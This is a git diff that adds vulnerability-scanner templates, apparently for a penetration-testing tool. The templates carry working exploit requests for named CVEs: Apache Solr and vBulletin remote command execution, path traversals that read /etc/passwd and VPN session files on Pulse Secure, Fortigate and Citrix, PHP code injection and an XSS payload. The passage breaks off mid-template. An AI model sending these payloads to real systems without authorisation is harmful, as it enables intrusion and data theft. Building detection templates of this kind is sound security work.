diff --git a/templates/active/ApPHP_MicroBlog_Remote_Code_Execution_Vulnerability.sh b/templates/active/ApPHP_MicroBlog_Remote_Code_Execution_Vulnerability.sh
new file mode 100644
index 0000000..22486e4
--- /dev/null
+++ b/templates/active/ApPHP_MicroBlog_Remote_Code_Execution_Vulnerability.sh
@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='ApPHP MicroBlog Remote Code Execution Vulnerability'
+URI='/index.php?b);phpinfo();echo(base64_decode('T3BlblZBUwo')=/'
+METHOD='GET'
+MATCH="
phpinfo\(\)"
+SEVERITY='P1 - CRITICAL'
+CURL_OPTS="--user-agent '' -s -L --insecure"
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'
\ No newline at end of file
diff --git a/templates/active/Apache_Solr_Scanner.sh b/templates/active/Apache_Solr_Scanner.sh
new file mode 100644
index 0000000..4fe906e
--- /dev/null
+++ b/templates/active/Apache_Solr_Scanner.sh
@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='Apache Solr Detected'
+URI='/'
+METHOD='GET'
+MATCH='Solr Admin'
+SEVERITY='P5 - INFO'
+CURL_OPTS="--user-agent '' -s -L --insecure"
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'
\ No newline at end of file
diff --git a/templates/active/CVE-2018-13379_-_Fortigate_Pulse_Connect_Secure_Directory_Traversal.sh b/templates/active/CVE-2018-13379_-_Fortigate_Pulse_Connect_Secure_Directory_Traversal.sh
new file mode 100644
index 0000000..8f5636b
--- /dev/null
+++ b/templates/active/CVE-2018-13379_-_Fortigate_Pulse_Connect_Secure_Directory_Traversal.sh
@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='CVE-2018-13379 - Fortigate Pulse Connect Secure Directory Traversal'
+URI='/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession'
+METHOD='GET'
+MATCH='\.\.\.\.\.\.\.\.\.\.\.\.\.'
+SEVERITY='P1 - CRITICAL'
+CURL_OPTS="--user-agent '' -s -L --insecure"
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'
\ No newline at end of file
diff --git a/templates/active/CVE-2019-11510_-_Pulse_Connect_Secure_SSL_VPN_Arbitrary_File_Read.sh b/templates/active/CVE-2019-11510_-_Pulse_Connect_Secure_SSL_VPN_Arbitrary_File_Read.sh
new file mode 100644
index 0000000..b69ec7d
--- /dev/null
+++ b/templates/active/CVE-2019-11510_-_Pulse_Connect_Secure_SSL_VPN_Arbitrary_File_Read.sh
@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='CVE-2019-11510 - Pulse Connect Secure SSL VPN Arbitrary File Read'
+URI='/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'
+METHOD='GET'
+MATCH='root\:'
+SEVERITY='P1 - CRITICAL'
+CURL_OPTS="--user-agent '' -s -L --insecure"
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'
\ No newline at end of file
diff --git a/templates/active/CVE-2019-11581_-_Jira_Template_Injection.sh b/templates/active/CVE-2019-11581_-_Jira_Template_Injection.sh
new file mode 100644
index 0000000..e95c255
--- /dev/null
+++ b/templates/active/CVE-2019-11581_-_Jira_Template_Injection.sh
@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='CVE-2019-11581 - Jira Template Injection'
+URI='/secure/ContactAdministrators!default.jspa'
+METHOD='GET'
+MATCH='Contact Site Administrators'
+SEVERITY='P1 - CRITICAL'
+CURL_OPTS="--user-agent '' -s -L --insecure"
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'
\ No newline at end of file
diff --git a/templates/active/CVE-2019-1653_-_Cisco_RV320_RV326_Configuration_Disclosure.sh b/templates/active/CVE-2019-1653_-_Cisco_RV320_RV326_Configuration_Disclosure.sh
new file mode 100644
index 0000000..4497802
--- /dev/null
+++ b/templates/active/CVE-2019-1653_-_Cisco_RV320_RV326_Configuration_Disclosure.sh
@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='CVE-2019-1653 - Cisco RV320 RV326 Configuration Disclosure'
+URI="/cgi-bin/config.exp"
+METHOD='GET'
+MATCH="sysconfig"
+SEVERITY='P1 - CRITICAL'
+CURL_OPTS="--user-agent '' -s -L --insecure"
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'
\ No newline at end of file
diff --git a/templates/active/CVE-2019-16759_-_vBulletin_5.x_0-Day_Pre-Auth_Remote_Command_Execution.sh b/templates/active/CVE-2019-16759_-_vBulletin_5.x_0-Day_Pre-Auth_Remote_Command_Execution.sh
new file mode 100644
index 0000000..b40969a
--- /dev/null
+++ b/templates/active/CVE-2019-16759_-_vBulletin_5.x_0-Day_Pre-Auth_Remote_Command_Execution.sh
@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='CVE-2019-16759 - vBulletin 5.x 0-Day Pre-Auth Remote Command Execution'
+URI='/'
+METHOD='POST'
+MATCH='1337'
+SEVERITY='P1 - CRITICAL'
+CURL_OPTS="-d 'routestring=ajax%2Frender%2Fwidget_php&widgetConfig%5Bcode%5D=echo+shell_exec%28%27echo+$((1%2B1336))%27%29%3B+exit%3B' -H 'Content-Type: application/x-www-form-urlencoded' --user-agent '' -s -L --insecure"
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'
\ No newline at end of file
diff --git a/templates/active/CVE-2019-17558_-_Apache_Solr_RCE.sh b/templates/active/CVE-2019-17558_-_Apache_Solr_RCE.sh
new file mode 100644
index 0000000..93e4f2e
--- /dev/null
+++ b/templates/active/CVE-2019-17558_-_Apache_Solr_RCE.sh
@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='CVE-2019-17558 - Apache Solr RCE'
+URI='/solr/dovecot/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27cat%20/etc/passwd%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'
+METHOD='GET'
+MATCH='root\:'
+SEVERITY='P1 - CRITICAL'
+CURL_OPTS="--user-agent '' -s -L --insecure"
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'
\ No newline at end of file
diff --git a/templates/active/CVE-2019-19781_-_Citrix_ADC_Directory_Traversal.sh b/templates/active/CVE-2019-19781_-_Citrix_ADC_Directory_Traversal.sh
new file mode 100644
index 0000000..804050e
--- /dev/null
+++ b/templates/active/CVE-2019-19781_-_Citrix_ADC_Directory_Traversal.sh
@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='CVE-2019-19781 - Citrix ADC Directory Traversal'
+URI='/vpn/../vpns/cfg/smb.conf'
+METHOD='GET'
+MATCH='\[global\]'
+SEVERITY='P1 - CRITICAL'
+CURL_OPTS="--user-agent '' -s -L --insecure"
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'
\ No newline at end of file
diff --git a/templates/active/CVE-2019-19908_-_phpMyChat-Plus_XSS.sh b/templates/active/CVE-2019-19908_-_phpMyChat-Plus_XSS.sh
new file mode 100644
index 0000000..7f55747
--- /dev/null
+++ b/templates/active/CVE-2019-19908_-_phpMyChat-Plus_XSS.sh
@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='CVE-2019-19908 - phpMyChat-Plus XSS'
+URI="/plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C"
+METHOD='GET'
+MATCH="